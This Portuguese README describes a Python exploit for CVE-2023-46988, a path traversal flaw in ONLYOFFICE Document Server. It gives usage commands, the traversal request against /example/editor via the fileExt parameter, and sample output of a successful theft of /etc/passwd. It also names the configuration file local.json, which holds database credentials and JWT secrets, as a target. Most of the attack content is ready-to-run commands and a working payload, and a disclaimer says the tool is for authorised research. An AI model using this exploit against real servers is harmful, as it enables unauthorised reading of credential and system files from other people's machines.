
CVE-2023-46988: Exploit de Path Traversal no ONLYOFFICE
Este script explora uma vulnerabilidade de path traversal no ONLYOFFICE Document Server (CVE-2023-46988) que permite que usuários não autorizados copiem arquivos arbitrários do servidor. A vulnerabilidade existe no endpoint /example/editor, onde o parâmetro fileExt pode ser manipulado para acessar arquivos sensíveis do sistema e de configuração.
Esta ferramenta é destinada exclusivamente a fins educacionais e de pesquisa de segurança autorizada.
O uso não autorizado contra sistemas sem permissão explícita é ilegal e antiético.
/etc/passwd/etc/onlyoffice/documentserver/local.json (contém credenciais de banco de dados e segredos JWT)--file.--proxy).--verify).python onlyoffice_exploit.py http://localhost
Isso recupera:
/etc/passwd/etc/onlyoffice/documentserver/local.json/etc/hosts)python onlyoffice_exploit.py http://localhost --file /etc/hosts
127.0.0.1:8080)python onlyoffice_exploit.py http://localhost --proxy
python onlyoffice_exploit.py http://localhost --proxy http://127.0.0.1:8080
python onlyoffice_exploit.py https://example.local --verify
python onlyoffice_exploit.py https://example.local --file /etc/hosts --proxy --verify
/example/editor com um parâmetro fileExt malicioso:
GET /example/editor?fileExt=../../../../../../../../etc/passwd
/example/download?fileName=<nome_do_arquivo_extraido>.[*] Target URL: http://localhost
[*] Attempting to retrieve: /etc/passwd
[*] Sending request to: http://localhost/example/editor?fileExt=../../../../../../../../etc/passwd
[+] Extracted Redirect URL: http://localhost/example/download?fileName=.passwd
[+] Extracted File Name: .passwd
[*] Downloading file: http://localhost/example/download?fileName=.passwd
[+] File downloaded successfully: .passwd
A ONLYOFFICE corrigiu esta vulnerabilidade em sua atualização de fevereiro de 2024.
Os usuários devem atualizar para a versão mais recente para proteger seus servidores.
Este projeto está licenciado sob a Licença MIT – consulte o arquivo LICENSE para obter detalhes.